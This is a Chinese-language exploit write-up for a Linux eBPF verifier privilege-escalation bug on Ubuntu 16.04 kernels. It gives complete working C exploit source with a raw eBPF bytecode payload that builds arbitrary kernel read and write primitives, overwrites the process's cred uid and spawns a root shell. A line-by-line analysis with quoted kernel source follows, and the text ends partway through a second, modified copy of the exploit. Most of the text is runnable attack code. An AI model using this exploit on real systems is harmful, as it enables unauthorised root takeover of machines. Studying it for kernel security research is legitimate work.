EXP

首先贴一下完整的payload

/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;


/*
 * Raw eBPF program: each string literal is one 8-byte instruction
 * (opcode, dst/src register nibbles, 16-bit offset, 32-bit immediate).
 * 41 instructions * 8 bytes = 328 bytes, which is what PROGSIZE states.
 * The bracketed numbers are instruction indices.
 */
char *__prog =
        "\xb4\x09\x00\x00\xff\xff\xff\xff" // [0] r9 = 0xffffffff (32-bit ALU mov immediate)
        "\x55\x09\x02\x00\xff\xff\xff\xff" // [1] if r9 != -1 goto +2 (skips [2] and [3])
        "\xb7\x00\x00\x00\x00\x00\x00\x00" // [2] r0 = 0
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [3] exit

        "\x18\x19\x00\x00\x03\x00\x00\x00" // [4] r9 = map: 64-bit immediate load, src_reg = 1, imm = fd 3
        "\x00\x00\x00\x00\x00\x00\x00\x00" // [5] second slot of the 16-byte immediate load
        
        "\xbf\x91\x00\x00\x00\x00\x00\x00" // [6] r1 = r9
        "\xbf\xa2\x00\x00\x00\x00\x00\x00" // [7] r2 = r10
        "\x07\x02\x00\x00\xfc\xff\xff\xff" // [8] r2 += -4
        "\x62\x0a\xfc\xff\x00\x00\x00\x00" // [9] *(u32 *)(r10 - 4) = 0 (key 0)
        "\x85\x00\x00\x00\x01\x00\x00\x00" // [10] call helper 1 (map lookup)
        "\x55\x00\x01\x00\x00\x00\x00\x00" // [11] if r0 != 0 goto +1
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [12] exit
        "\x79\x06\x00\x00\x00\x00\x00\x00" // [13] r6 = *(u64 *)(r0 + 0)
        "\xbf\x91\x00\x00\x00\x00\x00\x00" // [14] r1 = r9
        "\xbf\xa2\x00\x00\x00\x00\x00\x00" // [15] r2 = r10
        "\x07\x02\x00\x00\xfc\xff\xff\xff" // [16] r2 += -4
        "\x62\x0a\xfc\xff\x01\x00\x00\x00" // [17] *(u32 *)(r10 - 4) = 1 (key 1)
        "\x85\x00\x00\x00\x01\x00\x00\x00" // [18] call helper 1 (map lookup)
        "\x55\x00\x01\x00\x00\x00\x00\x00" // [19] if r0 != 0 goto +1
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [20] exit
        "\x79\x07\x00\x00\x00\x00\x00\x00" // [21] r7 = *(u64 *)(r0 + 0)
        "\xbf\x91\x00\x00\x00\x00\x00\x00" // [22] r1 = r9
        "\xbf\xa2\x00\x00\x00\x00\x00\x00" // [23] r2 = r10
        "\x07\x02\x00\x00\xfc\xff\xff\xff" // [24] r2 += -4
        "\x62\x0a\xfc\xff\x02\x00\x00\x00" // [25] *(u32 *)(r10 - 4) = 2 (key 2)
        "\x85\x00\x00\x00\x01\x00\x00\x00" // [26] call helper 1 (map lookup)
        "\x55\x00\x01\x00\x00\x00\x00\x00" // [27] if r0 != 0 goto +1
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [28] exit
        "\x79\x08\x00\x00\x00\x00\x00\x00" // [29] r8 = *(u64 *)(r0 + 0)
        "\xbf\x02\x00\x00\x00\x00\x00\x00" // [30] r2 = r0
        "\xb7\x00\x00\x00\x00\x00\x00\x00" // [31] r0 = 0
        "\x55\x06\x03\x00\x00\x00\x00\x00" // [32] if r6 != 0 goto +3 (to [36])
        "\x79\x73\x00\x00\x00\x00\x00\x00" // [33] r3 = *(u64 *)(r7 + 0)
        "\x7b\x32\x00\x00\x00\x00\x00\x00" // [34] *(u64 *)(r2 + 0) = r3
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [35] exit
        "\x55\x06\x02\x00\x01\x00\x00\x00" // [36] if r6 != 1 goto +2 (to [39])
        "\x7b\xa2\x00\x00\x00\x00\x00\x00" // [37] *(u64 *)(r2 + 0) = r10
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [38] exit
        "\x7b\x87\x00\x00\x00\x00\x00\x00" // [39] *(u64 *)(r7 + 0) = r8
        "\x95\x00\x00\x00\x00\x00\x00\x00"; // [40] exit

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version) {
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (__u64)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (__u64)license,
        .log_buf = (__u64)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Create a BPF map through the bpf() syscall (BPF_MAP_CREATE).
 *
 * map_type     kind of map to create
 * key_size     size of one key in bytes
 * value_size   size of one value in bytes
 * max_entries  capacity of the map
 *
 * Returns the raw syscall result.
 */
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries) {
    union bpf_attr attr;

    /* Zero every byte of the union; only the map fields are set below. */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)&value,
        .flags = 0,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)key,
        .value = (__u64)value,
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/* Print "error: <err>" on stderr and terminate the process with exit(-1). */
static void __exit(char *err) {
    fputs("error: ", stderr);
    fputs(err, stderr);
    fputc('\n', stderr);
    exit(-1);
}

/*
 * One-time setup: create the 3-entry array map, load __prog as a socket
 * filter, create a datagram socket pair and attach the program to
 * sockets[1]. Any failure ends the process through __exit().
 */
static void prep(void) {
    int rc;

    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
    if (mapfd < 0) {
        __exit(strerror(errno));
    }

    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
            (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);
    if (progfd < 0) {
        __exit(strerror(errno));
    }

    rc = socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets);
    if (rc != 0) {
        __exit(strerror(errno));
    }

    rc = setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd));
    if (rc < 0) {
        __exit(strerror(errno));
    }
}

/*
 * Write one 64-byte datagram to sockets[0]. A failed write is reported
 * with perror(); a short write is reported on stderr.
 */
static void writemsg(void) {
    /* Zero-filled so no indeterminate stack bytes are sent. */
    char buffer[64] = {0};

    ssize_t n = write(sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        return;
    }
    /* n is non-negative here, so the cast cannot change its value. */
    if ((size_t)n != sizeof(buffer))
        fprintf(stderr, "short write: %zd\n", n); /* %zd matches ssize_t */
}

/*
 * Set map[0], map[1] and map[2] to a, b and c, then call writemsg().
 * Wrapped in do { } while (0) so the macro expands to a single statement
 * and stays correct under an unbraced if/else.
 */
#define __update_elem(a, b, c) \
    do { \
        bpf_update_elem(0, (a)); \
        bpf_update_elem(1, (b)); \
        bpf_update_elem(2, (c)); \
        writemsg(); \
    } while (0)

/*
 * Return the 64-bit value stored under key in the map; ends the process
 * through __exit() if the lookup fails.
 */
static uint64_t get_value(int key) {
    uint64_t out;
    int rc = bpf_lookup_elem(&key, &out);

    if (rc != 0) {
        __exit(strerror(errno));
    }

    return out;
}

/* Set the map to {1, 0, 0}, trigger one write, and return map[2]. */
static uint64_t __get_fp(void) {
    uint64_t result;

    __update_elem(1, 0, 0);
    result = get_value(2);

    return result;
}

/* Set the map to {0, addr, 0}, trigger one write, and return map[2]. */
static uint64_t __read(uint64_t addr) {
    uint64_t result;

    __update_elem(0, addr, 0);
    result = get_value(2);

    return result;
}

/* Set the map to {2, addr, val} and trigger one write. */
static void __write(uint64_t addr, uint64_t val) {
    __update_elem(2, addr, val);
    return;
}

/*
 * Round addr down to a 0x4000-byte boundary. The caller reads a
 * task_struct pointer from the resulting address.
 */
static uint64_t get_sp(uint64_t addr) {
    const uint64_t alignment = 0x4000;

    return addr - (addr % alignment);
}

/* End the process through __exit(msg) when value is below PHYS_OFFSET. */
static void expect_kernel_addr(uint64_t value, char *msg) {
    if (value < PHYS_OFFSET)
        __exit(msg);
}

/*
 * Main sequence: obtain the frame pointer, derive the aligned stack
 * address, follow task_struct -> cred, zero the 8 bytes at
 * cred + UID_OFFSET, and start a shell if getuid() then reports 0.
 * Each intermediate value is sanity-checked against PHYS_OFFSET.
 */
static void pwn(void) {
    uint64_t fp, sp, task_struct, credptr, uidptr;

    fp = __get_fp();
    expect_kernel_addr(fp, "bogus fp");

    sp = get_sp(fp);
    expect_kernel_addr(sp, "bogus sp");

    task_struct = __read(sp);
    expect_kernel_addr(task_struct, "bogus task ptr");
    printf("task_struct = %lx\n", task_struct);

    credptr = __read(task_struct + CRED_OFFSET); /* cred pointer */
    expect_kernel_addr(credptr, "bogus cred ptr");

    uidptr = credptr + UID_OFFSET; /* address of uid */
    expect_kernel_addr(uidptr, "bogus uid ptr");
    printf("uidptr = %lx\n", uidptr);

    /* One 64-bit store covers both uid and gid. */
    __write(uidptr, 0);

    if (getuid() != 0)
        __exit("not vulnerable?");

    printf("spawning root shell\n");
    system("/bin/bash");
    exit(0);
}

/* Entry point: run the setup, then the main sequence. Arguments are unused. */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    prep();
    pwn();

    return 0;
}

EXP分析

首先我们看一下prep函数，此函数首先调用了bpf_create_map函数创建了一个大小为3的map结构，并将返回的map的fd赋值给了全局变量mapfd(测试后fd值为3)

之后，调用bpf_prog_load函数申请加载一个自定义的bpf指令集，类型为BPF_PROG_TYPE_SOCKET_FILTER，需要注意的是，在linux 4.4之前，bpf这个系统调用是需要CAP_SYS_ADMIN权限的，但是在linux 4.4之后，非特权用户可以使用BPF_PROG_TYPE_SOCKET_FILTER类型和相应的map创建受限的程序，所以这里我们作为非特权用户也只能创建这样的类型

在加载指令集的过程中，实际上就已经将我们的exp虚拟执行验证后加载了，上面一篇blog讲了exp的前四句，也即触发漏洞的部分，接着我们来讲讲exp的剩余指令，也即利用部分

在利用部分的一开头是如下两行指令

"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"

我们来看一下这两句指令在加载的过程中做了些什么

首先，来看看对应的系统调用处理函数的源码

/* last field in 'union bpf_attr' used by this command */
#define    BPF_PROG_LOAD_LAST_FIELD kern_version

/*
 * Kernel-side handler for the BPF_PROG_LOAD command (quoted kernel source).
 * Copies the license and the instructions from user space, allocates the
 * program, runs the verifier through bpf_check(), and on success returns
 * a new file descriptor for the program. On failure it returns a negative
 * errno value after unwinding through the labels at the bottom.
 */
static int bpf_prog_load(union bpf_attr *attr)
{
    enum bpf_prog_type type = attr->prog_type;
    struct bpf_prog *prog;
    int err;
    char license[128];
    bool is_gpl;

    if (CHECK_ATTR(BPF_PROG_LOAD))
        return -EINVAL;

    /* copy eBPF program license from user space */
    // NOTE: worth looking at how user space is accessed here
    if (strncpy_from_user(license, u64_to_ptr(attr->license),
                  sizeof(license) - 1) < 0)
        return -EFAULT;
    license[sizeof(license) - 1] = 0;  // NUL-terminate the copied license string

    /* eBPF programs must be GPL compatible to use GPL-ed functions */
    is_gpl = license_is_gpl_compatible(license); // check the license type

    if (attr->insn_cnt >= BPF_MAXINSNS)
        return -EINVAL;

    if (type == BPF_PROG_TYPE_KPROBE &&
        attr->kern_version != LINUX_VERSION_CODE)
        return -EINVAL;

    if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN)) // without CAP_SYS_ADMIN only BPF_PROG_TYPE_SOCKET_FILTER is allowed
        return -EPERM;

    /* plain bpf_prog allocation */
    prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
    if (!prog)
        return -ENOMEM;

    err = bpf_prog_charge_memlock(prog);
    if (err)
        goto free_prog_nouncharge;

    prog->len = attr->insn_cnt;

    err = -EFAULT;
    if (copy_from_user(prog->insns, u64_to_ptr(attr->insns), // copy the instructions into the prog structure
               prog->len * sizeof(struct bpf_insn)) != 0)
        goto free_prog;

    prog->orig_prog = NULL;
    prog->jited = 0;

    atomic_set(&prog->aux->refcnt, 1);
    prog->gpl_compatible = is_gpl ? 1 : 0;

    /* find program type: socket_filter vs tracing_filter */
    err = find_prog_type(type, prog);
    if (err < 0)
        goto free_prog;

    /* run eBPF verifier */
    err = bpf_check(&prog, attr); // hand the program to bpf_check
    if (err < 0)
        goto free_used_maps;

    /* fixup BPF_CALL->imm field */
    fixup_bpf_calls(prog);

    /* eBPF program is ready to be JITed */
    err = bpf_prog_select_runtime(prog);
    if (err < 0)
        goto free_used_maps;

    err = bpf_prog_new_fd(prog);
    if (err < 0)
        /* failed to allocate fd */
        goto free_used_maps;

    return err;

free_used_maps:
    free_used_maps(prog->aux);
free_prog:
    bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
    bpf_prog_free(prog);
    return err;
}

可以看到实际上我们的指令在虚拟加载时，并不是像前文一样直接到了do_check函数，而是先到了bpf_check函数(前文为了直接讨论核心部分，省略了此部分)

那么来看看bpf_check函数

/*
 * Verifier entry point (quoted kernel source). Validates the program
 * length, sets up the optional user-supplied log buffer, replaces map
 * file descriptors with map pointers, checks the control-flow graph and
 * then runs do_check(). Returns 0 when the program is accepted and a
 * negative errno value otherwise; *prog is written back before returning.
 */
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
    char __user *log_ubuf = NULL;
    struct verifier_env *env;
    int ret = -EINVAL;

    if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
        return -E2BIG;

    /* 'struct verifier_env' can be global, but since it's not small,
     * allocate/free it every time bpf_check() is called
     */
    env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
    if (!env)
        return -ENOMEM;

    env->prog = *prog;

    /* grab the mutex to protect few globals used by verifier */
    mutex_lock(&bpf_verifier_lock);

    if (attr->log_level || attr->log_buf || attr->log_size) {
        /* user requested verbose verifier output
         * and supplied buffer to store the verification trace
         */
        log_level = attr->log_level;
        log_ubuf = (char __user *) (unsigned long) attr->log_buf;
        log_size = attr->log_size;
        log_len = 0;

        ret = -EINVAL;
        /* log_* values have to be sane */
        if (log_size < 128 || log_size > UINT_MAX >> 8 ||
            log_level == 0 || log_ubuf == NULL)
            goto free_env;

        ret = -ENOMEM;
        log_buf = vmalloc(log_size);
        if (!log_buf)
            goto free_env;
    } else {
        log_level = 0;
    }

    /* first pass: turn map fds embedded in the instructions into map pointers */
    ret = replace_map_fd_with_map_ptr(env);
    if (ret < 0)
        goto skip_full_check;

    env->explored_states = kcalloc(env->prog->len,
                       sizeof(struct verifier_state_list *),
                       GFP_USER);
    ret = -ENOMEM;
    if (!env->explored_states)
        goto skip_full_check;

    ret = check_cfg(env);
    if (ret < 0)
        goto skip_full_check;

    env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

    /* main verification pass over the instructions */
    ret = do_check(env);

skip_full_check:
    while (pop_stack(env, NULL) >= 0);
    free_states(env);

    if (ret == 0)
        /* program is valid, convert *(u32*)(ctx + off) accesses */
        ret = convert_ctx_accesses(env);

    if (log_level && log_len >= log_size - 1) {
        BUG_ON(log_len >= log_size);
        /* verifier log exceeded user supplied buffer */
        ret = -ENOSPC;
        /* fall through to return what was recorded */
    }

    /* copy verifier log back to user space including trailing zero */
    if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
        ret = -EFAULT;
        goto free_log_buf;
    }

    if (ret == 0 && env->used_map_cnt) {
        /* if program passed verifier, update used_maps in bpf_prog_info */
        env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
                              sizeof(env->used_maps[0]),
                              GFP_KERNEL);

        if (!env->prog->aux->used_maps) {
            ret = -ENOMEM;
            goto free_log_buf;
        }

        memcpy(env->prog->aux->used_maps, env->used_maps,
               sizeof(env->used_maps[0]) * env->used_map_cnt);
        env->prog->aux->used_map_cnt = env->used_map_cnt;

        /* program is valid. Convert pseudo bpf_ld_imm64 into generic
         * bpf_ld_imm64 instructions
         */
        convert_pseudo_ld_imm64(env);
    }

free_log_buf:
    if (log_level)
        vfree(log_buf);
free_env:
    if (!env->prog->aux->used_maps)
        /* if we didn't copy map pointers into bpf_prog_info, release
         * them now. Otherwise free_bpf_prog_info() will release them.
         */
        release_maps(env);
    *prog = env->prog;
    kfree(env);
    mutex_unlock(&bpf_verifier_lock);
    return ret;
}

这里我们主要关注replace_map_fd_with_map_ptr函数，这个函数主要是将我们之前得到的mapfd转化为map的指针，以保证我们申请的map可以和我们申请的bpf指令联系起来

来看看这个函数的实现

/*
 * Walk every instruction of the program (quoted kernel source). Rejects
 * BPF_LDX/BPF_STX instructions that use reserved fields, and for each
 * 64-bit immediate load marked BPF_PSEUDO_MAP_FD resolves the fd in imm
 * to a struct bpf_map pointer, stores that pointer in the imm fields of
 * the instruction pair and records the map in env->used_maps.
 * Returns 0 on success or a negative errno value.
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
    struct bpf_insn *insn = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int i, j;

    for (i = 0; i < insn_cnt; i++, insn++) {  // outer loop over every instruction to be loaded
        if (BPF_CLASS(insn->code) == BPF_LDX &&
            (BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
            verbose("BPF_LDX uses reserved fields\n");
            return -EINVAL;
        }

        if (BPF_CLASS(insn->code) == BPF_STX &&
            ((BPF_MODE(insn->code) != BPF_MEM &&
              BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
            verbose("BPF_STX uses reserved fields\n");
            return -EINVAL;
        }

        if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { // line five of the payload has code 0x18, so it takes this branch
            struct bpf_map *map;
            struct fd f;

            // the second slot (line six of the payload) must have code, dst_reg,
            // src_reg and off all zero; this follows from the BPF_LD_IMM64
            // encoding discussed later in the article
            if (i == insn_cnt - 1 || insn[1].code != 0 ||
                insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
                insn[1].off != 0) {
                verbose("invalid bpf_ld_imm64 insn\n");
                return -EINVAL;
            }

            if (insn->src_reg == 0)
                /* valid generic load 64-bit imm */
                goto next_insn;

            if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
                verbose("unrecognized bpf_ld_imm64 insn\n");
                return -EINVAL;
            }
            // resolve the supplied fd to a map pointer
            f = fdget(insn->imm);
            map = __bpf_map_get(f);
            if (IS_ERR(map)) {
                verbose("fd %d is not pointing to valid bpf_map\n",
                    insn->imm);
                fdput(f);
                return PTR_ERR(map);
            }
            // store the pointer in two halves: the low 32 bits go into the imm
            // field (last 4 bytes) of payload line five, the high 32 bits into
            // the imm field of payload line six
            /* store map pointer inside BPF_LD_IMM64 instruction */
            insn[0].imm = (u32) (unsigned long) map;
            insn[1].imm = ((u64) (unsigned long) map) >> 32;

            /* check whether we recorded this map already */
            for (j = 0; j < env->used_map_cnt; j++)
                if (env->used_maps[j] == map) {
                    fdput(f);
                    goto next_insn;
                }

            if (env->used_map_cnt >= MAX_USED_MAPS) {
                fdput(f);
                return -E2BIG;
            }

            /* remember this map */
            env->used_maps[env->used_map_cnt++] = map;

            /* hold the map. If the program is rejected by verifier,
             * the map will be released by release_maps() or it
             * will be used by the valid program until it's unloaded
             * and all maps are released in free_bpf_prog_info()
             */
            bpf_map_inc(map, false);
            fdput(f);
next_insn:
            insn++;
            i++;
        }
    }

    /* now all pseudo BPF_LD_IMM64 instructions load valid
     * 'struct bpf_map *' into a register instead of user map_fd.
     * These pointers will be used later by verifier to validate map access.
     */
    return 0;
}

可以从上面的源代码以及我的相应注释中看到，此函数检查我们的指令中是否存在BPF_LD_IMM64指令，如果存在的话，将指令中的立即数所表示的fd转化为指针，保存指针值在我们的exp的第五行以及第六行的IMM区域

我们第五行的立即数IMM为0x3，我上面有说过，我们一开始申请的map的fd就是3，所以这里就相当于我们将我们之前申请的map与我们的指令进行了绑定

在注释中我提到第六行(除IMM字段外，即code、dst_reg、src_reg、off)必须为空，实际上有两个原因，首先是BPF_LD_IMM64指令的格式就是这么要求的

/*
 * 64-bit immediate load (quoted kernel source). BPF_LD_IMM64 is
 * BPF_LD_IMM64_RAW with SRC = 0.
 */
#define BPF_LD_IMM64(DST, IMM)                    \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

/*
 * Expands to TWO consecutive struct bpf_insn values: the first carries the
 * opcode, DST, SRC and the low 32 bits of IMM; the second has every field
 * zero except imm, which carries the high 32 bits of IMM.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_LD | BPF_DW | BPF_IMM,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = (__u32) (IMM) }),            \
    ((struct bpf_insn) {                    \
        .code  = 0, /* zero is reserved opcode */    \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = ((__u64) (IMM)) >> 32 })

可以看到，实际上调用BPF_LD_IMM64指令就是调用了BPF_LD_IMM64_RAW指令，此指令需要占据普通指令的2倍大小的空间

另外，由于指针的值需要被分为两部分储存，故而确实需要第六条指令为空来做存储

好了，我们接着看下面第七条指令之后的指令

将其解码之后，指令是这样的

// 上面两句payload执行完成后，map的指针会被赋值给BPF_REG_9寄存器
[6]: ALU64_MOV_X(9,1,0x0,0x0)
[7]: ALU64_MOV_X(10,2,0x0,0x0)
[8]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[9]: ST_MEM_W(0,10,0xfffc,0x0)
[10]: JMP_CALL(0,0,0x0,0x1)
[11]: JMP_JNE_K(0,0,0x1,0x0)
[12]: JMP_EXIT(0,0,0x0,0x0)
[13]: LDX_MEM_DW(0,6,0x0,0x0)
[14]: ALU64_MOV_X(9,1,0x0,0x0)
[15]: ALU64_MOV_X(10,2,0x0,0x0)
[16]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[17]: ST_MEM_W(0,10,0xfffc,0x1)
[18]: JMP_CALL(0,0,0x0,0x1)
[19]: JMP_JNE_K(0,0,0x1,0x0)
[20]: JMP_EXIT(0,0,0x0,0x0)
[21]: LDX_MEM_DW(0,7,0x0,0x0)
[22]: ALU64_MOV_X(9,1,0x0,0x0)
[23]: ALU64_MOV_X(10,2,0x0,0x0)
[24]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[25]: ST_MEM_W(0,10,0xfffc,0x2)
[26]: JMP_CALL(0,0,0x0,0x1)
[27]: JMP_JNE_K(0,0,0x1,0x0)
[28]: JMP_EXIT(0,0,0x0,0x0)
[29]: LDX_MEM_DW(0,8,0x0,0x0)
[30]: ALU64_MOV_X(0,2,0x0,0x0)
[31]: ALU64_MOV_K(0,0,0x0,0x0)
[32]: JMP_JNE_K(0,6,0x3,0x0)
[33]: LDX_MEM_DW(7,3,0x0,0x0)
[34]: STX_MEM_DW(3,2,0x0,0x0)
[35]: JMP_EXIT(0,0,0x0,0x0)
[36]: JMP_JNE_K(0,6,0x2,0x1)
[37]: STX_MEM_DW(10,2,0x0,0x0)
[38]: JMP_EXIT(0,0,0x0,0x0)
[39]: STX_MEM_DW(8,7,0x0,0x0)
[40]: JMP_EXIT(0,0,0x0,0x0)

另附上参考表

R0 – rax
R1 - rdi
R2 - rsi
R3 - rdx
R4 - rcx
R5 - r8
R6 - rbx
R7 - r13
R8 - r14
R9 - r15
R10 – rbp（帧指针，frame pointer）

先来看看6～13，翻译出来应该是

[6]: r1=r9
[7]: r2=rbp
[8]: r2 = r2-4
[9]: [rbp+(-4)] = 0
[10]: call BPF_FUNC_map_lookup_elem
[11]: if r0== 0:
[12]: exit(0)
[13]: r6=[r0]

其中编号9的语句，为ST_MEM_W类型的指令，表达的意思是*(uint *) (dst_reg + off16) = imm32，那么代入到此语句即向$rbp-4处赋值0，此举是为了准备参数(r2寄存器所指向的key)，准备调用BPF_FUNC_map_lookup_elem

编号为11的语句，BPF_FUNC_map_lookup_elem返回的是指针，所以r0中存放的是&map[0]

/*
 * Helper behind BPF_FUNC_map_lookup_elem (quoted kernel source).
 * r1 carries the map pointer and r2 the key pointer; r3-r5 are unused.
 * Returns the element pointer produced by the map's lookup operation,
 * or NULL, converted to an integer.
 */
static u64 bpf_map_lookup_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5)
{
    /* verifier checked that R1 contains a valid pointer to bpf_map
     * and R2 points to a program stack and map->key_size bytes were
     * initialized
     */
    struct bpf_map *map = (struct bpf_map *) (unsigned long) r1;
    void *key = (void *) (unsigned long) r2;
    void *value;

    WARN_ON_ONCE(!rcu_read_lock_held());

    value = map->ops->map_lookup_elem(map, key);

    /* lookup() returns either pointer to element value or NULL
     * which is the meaning of PTR_TO_MAP_VALUE_OR_NULL type
     */
    return (unsigned long) value;  // returns the element pointer, not the element value
}

在6～13语句执行完成后就相当于将r6赋值为map中第一个元素的值

之后的14-21，22-29都是一样的，分别表示的意思是r7 = map[1],r8 = map[2]

从30行开始，翻译如下

[30]: ALU64_MOV_X(0,2,0x0,0x0) r2=r0 // 此时r0为map[2]的地址
[31]: ALU64_MOV_K(0,0,0x0,0x0) r0=0  // r0置0
[32]: JMP_JNE_K(0,6,0x3,0x0)   if r6!=0 jmpto 36 
[33]: LDX_MEM_DW(7,3,0x0,0x0)  r3 = [r7]
[34]: STX_MEM_DW(3,2,0x0,0x0)  [r2]=r3
[35]: JMP_EXIT(0,0,0x0,0x0)    exit(0)
[36]: JMP_JNE_K(0,6,0x2,0x1)   if r6!=1 jmpto 39
[37]: STX_MEM_DW(10,2,0x0,0x0) [r2]=r10
[38]: JMP_EXIT(0,0,0x0,0x0)    exit(0)
[39]: STX_MEM_DW(8,7,0x0,0x0)  [r7]=r8
[40]: JMP_EXIT(0,0,0x0,0x0)    exit(0)

可以看到，这是最终执行利用的地方

在经过了6～29语句之后，r6 = map[0]，r7 = map[1],r8 = map[2]

而且map中的值是由用户定义的，用户可以通过BPF_MAP_UPDATE_ELEM这一bpf的调用type来改变map中每一项的值

那么根据上面的翻译

如果用户定义map[0] = 0,那么此时将会执行33-35语句，也就是尝试读map[1]中所保存的值所指向的地址中的值，并把读出的值赋值给map[2]
如果用户定义map[0] = 1,那么此时将会执行37-38语句，也就是尝试将r10寄存器的值赋值给map[2]，而r10在这里代表的是rbp
如果用户定义map[0] = 2,那么此时将会执行39-40语句，也就是尝试将map[2]中的值赋值给map[1]中所保存的值所指向的地址

简而言之，当map[0]为0、1、2时，分别代表了任意地址读、泄露内核栈地址、任意地址写这三个功能

知道了这些后，exp就十分容易明白了

贴出我修改的exp，在我的机器上运行成功

// Tested on:
// Linux 4.5.0 #0 SMP x86_64 GNU/Linux
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x9f8
#define UID_OFFSET 4
#define EUID_OFFSET 20
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;

/*
 * Raw eBPF program: each string literal is one 8-byte instruction
 * (opcode, dst/src register nibbles, 16-bit offset, 32-bit immediate).
 * 41 instructions * 8 bytes = 328 bytes, which is what PROGSIZE states.
 * The bracketed numbers are instruction indices.
 */
char *__prog =
        "\xb4\x09\x00\x00\xff\xff\xff\xff" // [0] r9 = 0xffffffff (32-bit ALU mov immediate)
        "\x55\x09\x02\x00\xff\xff\xff\xff" // [1] if r9 != -1 goto +2 (skips [2] and [3])
        "\xb7\x00\x00\x00\x00\x00\x00\x00" // [2] r0 = 0
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [3] exit
        "\x18\x19\x00\x00\x03\x00\x00\x00" // [4] r9 = map: 64-bit immediate load, src_reg = 1, imm = fd 3
        "\x00\x00\x00\x00\x00\x00\x00\x00" // [5] second slot of the 16-byte immediate load
        "\xbf\x91\x00\x00\x00\x00\x00\x00" // [6] r1 = r9
        "\xbf\xa2\x00\x00\x00\x00\x00\x00" // [7] r2 = r10
        "\x07\x02\x00\x00\xfc\xff\xff\xff" // [8] r2 += -4
        "\x62\x0a\xfc\xff\x00\x00\x00\x00" // [9] *(u32 *)(r10 - 4) = 0 (key 0)
        "\x85\x00\x00\x00\x01\x00\x00\x00" // [10] call helper 1 (map lookup)
